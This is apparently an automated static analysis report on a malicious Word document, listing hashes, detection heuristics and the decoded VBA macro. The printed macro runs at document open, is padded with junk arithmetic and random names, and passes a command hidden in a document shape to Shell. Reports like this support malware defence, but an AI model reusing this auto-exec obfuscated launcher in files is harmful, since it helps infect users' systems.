Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 da17ba8063d1d077…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 132.8 KB
Created: 2018-12-07 11:39:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: ad302afdc43e6d0651f7d7d98f3448f6
SHA-1: c346aee56b997044363fa82bd3ee5afa120d35a8
SHA-256: da17ba8063d1d0771b86dc7856a514efef200b4ea64bf3ef593549f5dbc4c35f
Risk score: 292

Heuristics (10)

  • ClamAV: Doc.Malware.Generic-6777200-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6777200-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
    aRjQVA = Array(HNiMu, iQcnlPzP, DVHbnDJWL, Interaction _
    .Shell(RIApLSKtj, miDwHrOYKwE), tQWfqD)
             Set QUDnjaXYKuUNWNLnPIUocU = EYuwjwIvFwHLXlnSaQG
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
    Attribute VB_Customizable = True
    Sub autoopen()
    MVAUJouw
  • Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
  • Reference to PowerShell [high] SC_STR_POWERSHELL
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body). This is the standard DrawingML XML namespace URI present in ordinary Office files and is not an indicator on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6831 bytes
SHA-256: e6a0b3f121028cac938f54610c5d898a3b4899d9c9b04c9272c123557fc91fe3
Detection: ClamAV: No threats found
Obfuscation or payload: likely
179 of 215 identifiers look randomly generated (e.g. 'atrjhRoYMqjIOIcjzuWsKCWB'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "VQpNBKf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
MVAUJouw
End Sub

Attribute VB_Name = "iQFVvzNW"
Function MVAUJouw()
On Error Resume Next
         Set EvmGKZAltbsFdhwtwQohHS = QaBMsaWMjNwvBKWFmlTOEn
      jPLviFWWilIWfJ = HLXOMrflwjaKBwoE
      cZRwjirGJqTKtnqvZdHqp = JDdPMEuUZqhZuGrQbhf / CLng(53872523) * 18269485 / Tan(5727088) + bCvjPcTjNsBPOTQR - Cos(257284790) + (80273471 / Int(QcdTtkDICaLhYIrCMQUfrG))
         Set OVTXpDRXPjHjGNaPPZRo = CElJZvkYSiOLZmwMZUOsOkLS
      kzrWvwqQhMRiOPIhwzBs = jbiCpFCvhRtSfozsCX
      YvsaiiLEFKQnKaIEWNUFt = UzvYQjbLowaRUZnBzYiAwk / CLng(114648272) * 195741114 / Tan(232123615) + WkbfhRpkatfGNbduWUNsGjQ - Cos(138122543) + (87948741 / Int(atrjhRoYMqjIOIcjzuWsKCWB))
         Set RvddCJlIsrlGZXmTncH = FBknYcKovZrHZh
      aVizKKrUGVjwTVl = YVMUPLpEawzMSzdjrQMzEiws
      hdRpiqSKaTmMNrPfi = MNiBGsCGDJnttZUFih / CLng(162253773) * 98143917 / Tan(316592792) + iBrfrTdYwRaHkfk - Cos(212389453) + (151689192 / Int(mXnJWhaMsIJiHPbDicJ))
         Set zzTYDVbMUBpQiXd = jjaoqtRjowUtpWZWYVsdwI
      oHwGTwSHdNYrhdJREijjFA = WzcSrNiAoatmhumwkVrqj
      frtPDovOZhnZZJqja = wNjRoqcWRjwNNJAFSlZcKqF / CLng(170089636) * 8313466 / Tan(81659127) + HVdHEvzsThNDCmjWLQLTdYTr - Cos(35619262) + (42562938 / Int(jIHJQbrVBncuSQRhYEhXpdTt))
         Set nHXHnCiNzwWVHI = zLIFIrNfObYiNYiwP
      WiHrDXiwjJYZCvl = zpFkPNZcJjOXVoTCGPlaHGI
      aKHEHpYctUZoqfrJIfhWI = cuqVSnKLlshUJFF / CLng(138905047) * 138056377 / Tan(130500070) + liAPiLbXbRbYlcU - Cos(221532315) + (84380909 / Int(lXkShjjHWWmEnKNO))
         Set IqGziOnGvzXXsoiihIaWAf = vjRXlIEDMdtNwtCvhj
      lYcjNXtTDBNaodUKTNrCwrtL = wbiliNsnEtzTwDAroABzCFj
      ijhpjzuiQpPvKiYoUnj = XrWKrKKqsLrtrHCufDGHz / CLng(125210965) * 16633098 / Tan(42255968) + EjGcNfOVzErMXwWnDmFwWE - Cos(23876104) + (207437518 / Int(IRhblEoQWmdDOijcXrDL))
Set bfMKqPi = VQpNBKf.Shapes(JUwroXsHj + "tFjZfowUiKwQWS" + XTzRiXoEl).TextFrame
         Set MDnHUOcomzoZKSaPjJAb = PimlplWvJGUEZpOAq
      jQiLdDuDMWitbbLOzYBWi = GsdqTUkdMPsYTLlDBjrm
      zRPftsKspzTGDKlinjZ = iKPBCIAdtXRfsDGbOK / CLng(175066885) * 184002146 / Tan(171007190) + WPZSPAzVNzRTrpBOdlshw - Cos(118411255) + (218852605 / Int(NADKUcIzsznzbksziXJSNZ))
         Set iXarWQGopRuiBdYH = sNYRjrASpuDpOqaXM
      izJfUkPETETZjrqvfaItzjZZ = VDwbbTLpiqIGMsoCbXvw
      LLwSKzOSBBZkwzjQd = kIjEBipSiUrVIdbQJsAIRTw / CLng(151501819) * 195734902 / Tan(265615178) + VNsHmwjKpjGJPdrRuaftw - Cos(59307397) + (227342404 / Int(oQUaRLMbNATFpMFXcSljDi))
         Set rVMKXXLzptfCOvkL = uqXWhDlsmwAZSBo
      UTacLOGATCQtjhWavC = MLoJSaRlaKYWrrjtbJ
      ufjXCinrJEaadPjbHjJIC = djpvjYCznuQMIpcolifjHjA / CLng(240329053) * 305235907 / Tan(44253822) + PbNSBjACDhHwOoJQ - Cos(207879507) + (62201248 / Int(HqzTuicSmzjFAZMmY))
         Set YlUWnaVbqiIpjQMqp = fVDCiCCMpnlNuFQ
      OULSMnmolnERtVhtERtlL = HSTbliqckDYwCrfWsr
      PRqzlTTFrJcMfYsNszlCE = IDBtzSqOhYBCwEQVhHRdwTHr / CLng(294589975) * 159158910 / Tan(65585220) + mXHpiQImwsWAPdbEKdbo - Cos(319624194) + (156474401 / Int(dkbzpwJAYILbKRMXf))
RIApLSKtj = bfMKqPi.ContainingRange + FPzoBlr + zhpjsmF + tCBmtss + PYNowr + pWYbu + TNAKiRrf + IPanolk + wTKRa + jvOPpN + jqXFa + ojoWWLH
         Set htfOORZBtUAhESiiYQCu = ZrPkMoSccXBMtW
      qlkGViCJmMKBub = ukjiHBQdCcGYRzwULw
      rmjwZTWidYBnYBFdRfO = AaHidOKlLnrzESkkN / CLng(263089420) * 51921844 / Tan(76589156) + TmEApiXMUhpwibRfzSKIl - Cos(152276132) + (274301135 / Int(CiFRUPdXCdhnChnjnZrG))
         Set ShsKKCSTCvnsLd = WfCLsJfSGPaIZv
      YtrOHiLmEjIrBtiikmDzKJ = trmPmvjtsYPXuBwVZ
      swfjSdYckqVWvcOd = XUPZqUmPTmWkdnRdoRLlJZIq / CLng(67753135) * 69339075 / Tan(294509910) + WcmIQDZAKlBdsUwrBsH - Cos(21645477) + (25974766 / Int(GLDsowLYPjbOtqzOTZOQSDP))
         Set pTrXdzwTatOfZrZsvm = ZnXGQXzaVbhifZGOAv
      zADKvKHDUflcrmrjjS = bAiZcrtKiGSdYwYo
      WcbwIUiujzpvoqavnU = SaaTCzZwCCMfSwWMDr / CLng(113744723) * 123068859 / Tan(210484288) + itsDOuPshlcCWt - Cos(313561437) + (61259970 / Int(wjXbsWTXzRdWEVBqRwh))
         Set rPnaWpjpUhsYSDkwCrRzB = JzNDDZUDzrKumNR
      WjDMOirJTKPOwlzFi = FoMTlGURhBOXQWjnVitpqa
      EjtJGGOuELAHdBD = zrwAquvushIQOLtvfjIjswOK / CLng(127911308) * 42939518 / Tan(66754889) + PODlRkwztZRJnwRY - Cos(328286228) + (331378752 / Int(tSFczsTEAdmhjkjidiWw))
         Set fjijftojSMLEHw = SlsmcHXmvtMYasSNGkJrLNX
      FfwwpirwTIsYcjhzHwmq = VOozzETzGfFNLhzKbz
      CQERzukXDMkOahMj = IwqiXwNcnKQCkmjzZ / CLng(263207300) * 20812565 / Tan(115849743) + oFPhQkVQifwzjCfHjfRqoMjT - Cos(136026693) + (125845625 / Int(EPBtJSTTqawGNrMIfRE))
         Set hhmCkJRwodzqTi = QOtzuOHdFvrubHnzhzamis
      upuPKlzSGQoVcljmoaDh = sPqqAfSstvJXhwJ
      zzrFcldmmLLwLl = aLYBaDZJFhaMUfzu / CLng(255727027) * 168051385 / Tan(250047386) + dMbiGlDDoTThIiiMIzjwZn - Cos(249718005) + (160346726 / Int(ZIHpRZYZvjOjuu))
Const miDwHrOYKwE = 0
         Set bqzDZqzoariXiiEpDuMoYsmZ = poFMFBLWQzccptiQ
      ijninUAYwIqjaiDXskCscUq = ARibMNBiYhNFmcCUEn
      sUmqRYFwJjYOKqQh = pZLiHMLtUwlQhhnoKz / CLng(15190249) * 95632259 / Tan(182906478) + CHRrzASDOVuhffbb - Cos(243260388) + (53488584 / Int(zwaTjbwkZztOTtbWEQQ))
         Set jICZLfscZqBLLDkicjYR = zhVOdRBRoBqUADPAYRXLZqZ
      rLIApOfUCmmbhLhOrLkoKr = zUhDOAGTGHhWRIAb
      VWSNQoTNjJTOGkdAAIj = LQTvTfTAoPFrjKT / CLng(265714001) * 165181594 / Tan(327287747) + fOqfqnEAWDWRATTOECWuk - Cos(138502362) + (123649514 / Int(TDcivRpbCZAtVldIOfw))
aRjQVA = Array(HNiMu, iQcnlPzP, DVHbnDJWL, Interaction _
.Shell(RIApLSKtj, miDwHrOYKwE), tQWfqD)
         Set QUDnjaXYKuUNWNLnPIUocU = EYuwjwIvFwHLXlnSaQG
      oAVXtAjzOdSKwuz = odrZBzORPBoBbqtYV
      lDDWDjPIjcdzOcmYd = ZjEpmEIrMhYYjuoiJvLRaKKs / CLng(122258163) * 246832765 / Tan(257732651) + mLOCMwwpKvRwOMUhk - Cos(54542805) + (298930647 / Int(JjSrMMXOVLXARqEATVMnw))
         Set vfMNLiZqNffGWPs = lRwzoKqrQMcuLHUqI
      SjjsafjOzUdCBcLw = vjBTlpVzzCifFKpzKz
      isqSOZKWOOKAjMk = HHsjuOvbdEitJnEqiCU / CLng(198446513) * 33725157 / Tan(109447297) + tbSGioCvSVliqSQOQzPpJr - Cos(109531901) + (82047734 / Int(JUVhsGUqUwFbHMmaJQY))
         Set XRCTJhwnBMvnuCP = kTTauXCFCVbobvzVnp
      cJdhLMfjInkEKQsMEQO = zOwRnFJMFNazFdmK
      mHNPruSSRRXijvE = bZOMLtGCTauMkwhiiES / CLng(59841797) * 4138916 / Tan(334115923) + UizWomdWSWadEYw - Cos(313111855) + (294093644 / Int(LwQzFhSjsAicvY))
         Set cuQNwfVtpTJHZIjFL = IzaZVwoGjksXXBRT
      pJaHGLtzTmRTGZZ = RMrrDYSYpvlBRvI
      FzrwkEBnhZCMXncLSOFoac = QqBRLasiXibNHhd / CLng(155209264) * 82990786 / Tan(71866917) + JiWGBCTaiCqTPd - Cos(302441747) + (181447883 / Int(jnqNpriiwZVdort))
End Function